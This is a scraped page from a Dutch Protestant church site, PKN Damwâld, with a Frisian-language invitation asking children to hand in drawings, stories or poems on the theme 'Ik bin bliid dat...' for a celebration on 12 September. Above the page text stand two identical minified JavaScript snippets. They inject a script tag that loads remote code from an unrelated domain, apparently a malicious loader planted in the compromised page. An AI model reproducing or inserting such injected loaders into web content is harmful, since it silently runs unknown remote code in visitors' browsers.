;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Feestzondag 12 september ... Ik bin bliid dat …… doen jullie mee ? - PKN Damwâld

Feestzondag 12 september … Ik bin bliid dat …… doen jullie mee ?

Gepubliceerd op: donderdag 29 juli 2021

Leave jongens en famkes,

Wat is it in nûvere tiid net. Miskien soenen jimme wol nei it bûtenlân op fakânsje, mar giet troch de corona toch net troch. De measten fan jimme sille no wol net sa faak nei ’t tsjerke gean. Dochs hearre jimme der allegearre by !!!!!! Dêrom hawwe wij wat betocht. As der wat tiid oer is en jimme witte neat te dwaan, meitsje dan in moaie tekening, ferhaaltje of in gedicht oer it thema:

                                       Ik bin bliid dat ………

 

Leverje it spul yn foar 22 augustus, bij de achter yngong fan e Ontmoeting sit een brievebus. Dan hingje wij jimme keunstwurken op. Wat dogge we op 12 september. Eltsenien dy’t wat ynlevert kriget op die dei in kadootsje ast dan komst. Meitsje d’r mar wat moais fan. Wij sjogge der nei ut.

De Kommisje